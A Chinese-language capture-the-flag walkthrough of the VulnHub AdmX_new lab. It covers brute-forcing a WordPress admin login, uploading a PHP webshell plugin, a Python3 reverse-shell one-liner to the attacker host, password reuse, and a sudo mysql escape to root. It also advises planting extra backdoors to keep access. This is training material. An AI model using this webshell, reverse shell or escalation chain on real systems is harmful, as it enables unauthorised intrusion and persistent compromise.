VulnHub-AdmX_new

靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z

目标:取得 2 个 flag + root 权限

一、主机发现

使用nmap扫描192.168.11.0/24网段(nmap不如arp-scan速度快)可以知道192.168.11.135就是靶机的IP

nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
192.168.11.1
192.168.11.135
192.168.11.254
192.168.11.131

二、端口扫描

进行全端口发现目标靶机只开启了一个80端口

nmap -p- 192.168.11.135

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:12 CST
Nmap scan report for 192.168.11.135
Host is up (0.00069s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:81:91:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 118.46 seconds

三、服务版本扫描

对80端口进行针对性扫描,可以看到80端口运行的是在Apache服务器上的http服务,目标系统是Ubuntu。

nmap -p80 -sV 192.168.11.135

┌──(root㉿kali)-[~]
└─# nmap -p80 -sV 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:17 CST
Nmap scan report for 192.168.11.135
Host is up (0.00041s latency).

PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:81:91:C6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds

四、查看服务端口

查看目标网站http://192.168.11.135:80/没有任何发现。

五、目录扫描

1、feroxbuster扫描

使用feroxbuster爆破扫描靶机http服务网站路径

feroxbuster --url http://192.168.11.135/

  • -w # 指定字典(默认字典/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt)

┌──(root㉿kali)-[~]
└─# feroxbuster --url http://192.168.11.135/

___ ___ __   __     __     __         __   ___
|__ |__ |__) |__) | / `   / \ \_/ | | \ |__
|   |___ | \ | \ | \__,   \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.3
───────────────────────────┬──────────────────────
🎯 Target Url           │ http://192.168.11.135/
🚀 Threads               │ 50
📖 Wordlist             │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes         │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs)       │ 7
🦡 User-Agent           │ feroxbuster/2.7.3
💉 Config File           │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods         │ [GET]
🔃 Recursion Depth       │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────

2、WordPress访问异常

2.1 BurpSuite抓包分析

当访问http://192.168.11.135/wordpress/时,网站要调用192.168.159.145上的js文件来美化页面,但其实这两个ip指向的都是wordpress这个cms。

2.2 Match and Replace

因为访问192.168.11.135时服务器会通过响应包的形式返回192.168.159.145给客户端,所以需要将响应包中192.168.159.145这个ip替换为192.168.11.135即可快速访问页面。

2.3 访问查询到的目录

2.3.1 WP样品页面

http://192.168.11.135/wordpress/

2.3.2 WP后台登录页面

http://192.168.11.135/wordpress/wp-admin/ => http://192.168.11.135/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.135%2Fwordpress%2Fwp-admin%2F&reauth=1

六、密码爆破

通过页面测试得到用户名是admin

通过爆破得到密码是adam14

字典下载:SuperWordlist

所用字典:MidPwds.txt

登录后台

  • 用户名:admin

  • 密码:adam14

七、Wordpress后台漏洞利用

  • media中可以进行文件上传

  • appearance(外观)中可以上传一句话木马

  • plugins(插件)上传插件时也可以进行一句话木马的上传

1、plugins中插入一句话木马

1.1 创建木马插件shell.php

<?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/

if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>

1.2 压缩成zip

zip shell.zip shell.php

┌──(root㉿kali)-[~/admx]
└─# zip shell.zip shell.php
adding: shell.php (deflated 33%)

┌──(root㉿kali)-[~/admx]
└─# ls
shell.php shell.zip

1.3 上传shell.zip

上传成功

1.4 验证shell.zip

进行靶机命令测试(which python3)

http://192.168.11.135/wordpress/wp-content/plugins/shell.php?cmd=which%20python3

2、NC反弹Shell

2.1 侦听6969端口

nc -lvnp 6969

2.2 利用Python3反弹

注:其它的反弹不成功,只有Python3可以

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.131",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

2.3 拿到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$

2.4 升级Full TTY终端

  1. CTRL+Z

  2. stty raw -echo

  3. fg

  4. ls

  5. export SHELL=/bin/bash

  6. export TERM=screen

  7. stty rows 33 columns 145

  8. reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$ ^Z
[1]+ 已停止               nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 8989
            ls
index.php       wp-blog-header.php   wp-cron.php       wp-mail.php
license.txt     wp-comments-post.php wp-includes       wp-settings.php
readme.html     wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php         wp-load.php       wp-trackback.php
wp-admin         wp-content           wp-login.php       xmlrpc.php
www-data@wp:/var/www/html/wordpress$ export SHELL=/bin/bash
www-data@wp:/var/www/html/wordpress$ export TERM=screen
www-data@wp:/var/www/html/wordpress$ stty rows 33 columns 145
www-data@wp:/var/www/html/wordpress$ reset
www-data@wp:/var/www/html/wordpress$

注:可以写入一句话木马(蚁剑上线)等插入更多后门,实战中防止被查杀后丢失权限。

2.5 内网信息收集

在信息收集过程中找到了名为local.txt文件,但是只有wpadmin用户有权限查看。

www-data@wp:/var/www/html/wordpress$ ls -al
total 224
drwxr-x--- 5 www-data www-data 4096 May 8 2021 .
drwxr-xr-x 4 root root 4096 May 8 2021 ..
-rw-r----- 1 www-data www-data 543 May 11 2021 .htaccess
-rw-r----- 1 www-data www-data 405 Feb 6 2020 index.php
-rw-r----- 1 www-data www-data 19915 Jan 1 2021 license.txt
-rw-r----- 1 www-data www-data 7345 Dec 29 2020 readme.html
-rw-r----- 1 www-data www-data 7165 Jan 21 2021 wp-activate.php
drwxr-x--- 9 www-data www-data 4096 Apr 15 2021 wp-admin
-rw-r----- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rw-r----- 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php
-rw-r----- 1 www-data www-data 2913 Feb 6 2020 wp-config-sample.php
-rw-r----- 1 www-data www-data 1160 May 8 2021 wp-config.php
drwxr-x--- 6 www-data www-data 4096 Apr 14 01:05 wp-content
-rw-r----- 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-x--- 25 www-data www-data 12288 Apr 15 2021 wp-includes
-rw-r----- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rw-r----- 1 www-data www-data 3313 Jan 10 2021 wp-load.php
-rw-r----- 1 www-data www-data 44994 Apr 4 2021 wp-login.php
-rw-r----- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rw-r----- 1 www-data www-data 21125 Feb 2 2021 wp-settings.php
-rw-r----- 1 www-data www-data 31328 Jan 27 2021 wp-signup.php
-rw-r----- 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rw-r----- 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
www-data@wp:/home/wpadmin$ cd /root/
bash: cd: /root/: Permission denied
www-data@wp:/var/www/html/wordpress$ cd /home/
www-data@wp:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 wpadmin
www-data@wp:/home$ cd wpadmin/
www-data@wp:/home/wpadmin$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
www-data@wp:/home/wpadmin$ cat local.txt
cat: local.txt: Permission denied

八、密码复用

1、获取wpadmin用户shell

在信息收集过程中还发现了wordpress下的数据库配置文件wp-config.php,里面有用户名密码等。

www-data@wp:/var/www/html/wordpress$ cat wp-config.php 
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );

$table_prefix = 'wp_';

define( 'WP_DEBUG', false );

if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';www-data@wp:/var/www/html/wordpress$

网站管理员有可能会用相同的密码,利用已经获得密码去尝试登录wpadmin

su wpadmin

用已经获得的后台管理密码(adam14)登录成功,查看在/home/wpadmin/目录下的local.txt文件

www-data@wp:/var/www$ su wpadmin
Password:
wpadmin@wp:/var/www$ cd ~
wpadmin@wp:~$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
wpadmin@wp:~$ cat local.txt
153495edec1b606c24947b1335998bd9
wpadmin@wp:~$

获得flag

153495edec1b606c24947b1335998bd9

2、利用MySQL提权

经过测试发现,没有root权限

wpadmin@wp:~$ sudo ls -al /root/
[sudo] password for wpadmin:
Sorry, user wpadmin is not allowed to execute '/usr/bin/ls -al /root/' as root on wp.
wpadmin@wp:~$ sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p

根据(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p考虑使用MySQL提权

sudo /usr/bin/mysql -u root -D wordpress -p

! /bin/bash

wpadmin@wp:~$ sudo /usr/bin/mysql -u root -D wordpress -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 220
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [wordpress]> system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [wordpress]> \! /bin/bash
root@wp:/home/wpadmin# id
uid=0(root) gid=0(root) groups=0(root)

至此已获取root权限,然后查找并获取第二个flag

root@wp:/home/wpadmin# cd /root/
root@wp:~# la -al
total 36
drwx------ 5 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 May 8 2021 .cache
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 May 8 2021 proof.txt
drwxr-xr-x 3 root root 4096 May 8 2021 snap
drwx------ 2 root root 4096 May 8 2021 .ssh
-rw-r--r-- 1 root root 227 May 8 2021 .wget-hsts
root@wp:~# cat proof.txt
7efd721c8bfff2937c66235f2d0dbac1
root@wp:~#

至此打靶完成,游戏结束OVO

posted @ 2023-04-14 10:54  HKalpa  阅读(213)  评论(0编辑  收藏  举报